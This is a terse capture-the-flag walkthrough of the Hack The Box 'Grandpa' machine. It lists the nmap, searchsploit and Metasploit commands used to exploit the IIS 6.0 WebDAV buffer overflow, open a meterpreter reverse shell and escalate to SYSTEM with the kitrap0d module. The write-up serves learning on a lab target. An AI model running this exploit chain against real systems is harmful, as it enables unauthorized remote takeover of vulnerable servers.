TCM PEH Hacking Grandpa Notes
HTB Grandpa
These are getting old
nmap -A -T4 -p- 10.10.10.14
Noted port 80 open
Noted port 80 IIS 6.0
Noted potentially risky methods (TRACE, PUT, PROPFIND, SEARCH, LOCK, UNLOCK, DELETE, MOVE, MKCOL)
Noted Windows Server 2003 OS guess
Googled IIS 6.0 exploit
Found exploit-db WebDAV ScStoragePathFromUrl exploit remote buffer overflow
Read through exploit, looks like it might work
searchsploit ScStoragePathFromUrl
Noted modules exist
msfconsole
search ScStoragePathFromUrl
Noted results
use 0
options
set rhosts tun0
show targets
exploit
Noted no session created
exploit
Noted no session created
set lport 5555
exploit
Noted no session created
exploit
Noted meterpreter shell (wtf)
getuid
Access denied
sysinfo
ps
migrate 1788
Noted migration successful, am now NETWORK SERVICE
background
search suggester
use 0
options
set session 1
run
Noted several exploits appear to be applicable
use exploit/windows/local/ms10_015_kitrap0d
options
set session 1
exploit
Noted failed, still on wrong IP because lhost option not yet set
set lhost tun0
exploit
Noted meterpreter shell
sysinfo
getuid
Noted am NT AUTHORITY\SYSTEM
Let me know what you think of this article on twitter @cpardue09 or leave a comment below!